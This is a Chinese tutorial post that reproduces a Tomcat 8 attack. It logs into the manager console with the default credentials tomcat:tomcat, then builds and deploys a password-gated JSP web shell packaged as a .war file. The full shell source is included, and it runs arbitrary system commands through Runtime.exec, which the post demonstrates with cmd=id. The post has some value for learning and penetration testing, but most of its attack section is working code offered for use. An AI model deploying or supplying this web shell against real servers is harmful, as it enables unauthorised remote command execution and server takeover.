Java教程

tomcat8+ 弱口令 && 后台getshell 漏洞复现

本文主要是介绍tomcat8+ 弱口令 && 后台getshell 漏洞复现,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

1、漏洞利用

访问http://your ip:8080/manager/html,进入后台登录,输入弱密码tomcat:tomcat。

制作一个木马文件,准备一个ma.jsp,再将它压缩成ma.zip,压缩完成后再将后缀名改为ma.war

木马内容如下:

<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>一句话木马</title>
</head>

<body>
<%
if ("admin".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>

</html>
上传我们做好的木马文件

 

 

 

 

 上传成功

访问http://your ip:8080/ma/ma.jsp?pwd=admin&cmd=id

 

 成功执行命令

 

这篇关于tomcat8+ 弱口令 && 后台getshell 漏洞复现的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!